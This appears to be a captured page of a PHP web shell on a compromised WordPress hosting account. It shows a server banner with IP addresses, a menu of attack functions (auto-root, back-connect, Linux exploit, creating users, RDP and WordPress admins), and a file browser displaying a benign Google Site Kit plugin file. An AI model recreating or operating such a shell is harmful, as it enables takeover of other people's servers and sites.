Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.218.87.150
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Core /
Dashboard_Sharing /
[ HOME SHELL ]
Name
Size
Permission
Action
Activity_Metrics
[ DIR ]
drwxr-xr-x
Dashboard_Sharing.php
1.76
KB
-rw-r--r--
View_Only_Pointer.php
2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : View_Only_Pointer.php
<?php /** * Class Google\Site_Kit\Core\Dashboard_Sharing\View_Only_Pointer * * @package Google\Site_Kit * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Dashboard_Sharing; use Google\Site_Kit\Core\Admin\Pointer; use Google\Site_Kit\Core\Permissions\Permissions; /** * Class for view-only pointer. * * @since 1.83.0. * @access private * @ignore */ final class View_Only_Pointer { const SLUG = 'googlesitekit-view-only-pointer'; /** * Registers functionality through WordPress hooks. * * @since 1.83.0 */ public function register() { add_filter( 'googlesitekit_admin_pointers', function ( $pointers ) { $pointers[] = $this->get_view_only_pointer(); return $pointers; } ); } /** * Gets the view-only pointer. * * @since 1.83.0. * * @return Pointer Admin notice instance. */ private function get_view_only_pointer() { return new Pointer( self::SLUG, array( 'title' => __( 'You now have access to Site Kit', 'google-site-kit' ), 'content' => __( 'Check Site Kit’s dashboard to find out how much traffic your site is getting, your most popular pages, top keywords people use to find your site on Search, and more.', 'google-site-kit' ), 'target_id' => 'toplevel_page_googlesitekit-dashboard', 'active_callback' => function ( $hook_suffix ) { if ( 'index.php' !== $hook_suffix || current_user_can( Permissions::AUTHENTICATE ) || ! current_user_can( Permissions::VIEW_SPLASH ) ) { return false; } $dismissed_wp_pointers = get_user_meta( get_current_user_id(), 'dismissed_wp_pointers', true ); if ( ! $dismissed_wp_pointers ) { return true; } $dismissed_wp_pointers = explode( ',', $dismissed_wp_pointers ); if ( in_array( self::SLUG, $dismissed_wp_pointers, true ) ) { return false; } return true; }, ) ); } }
Close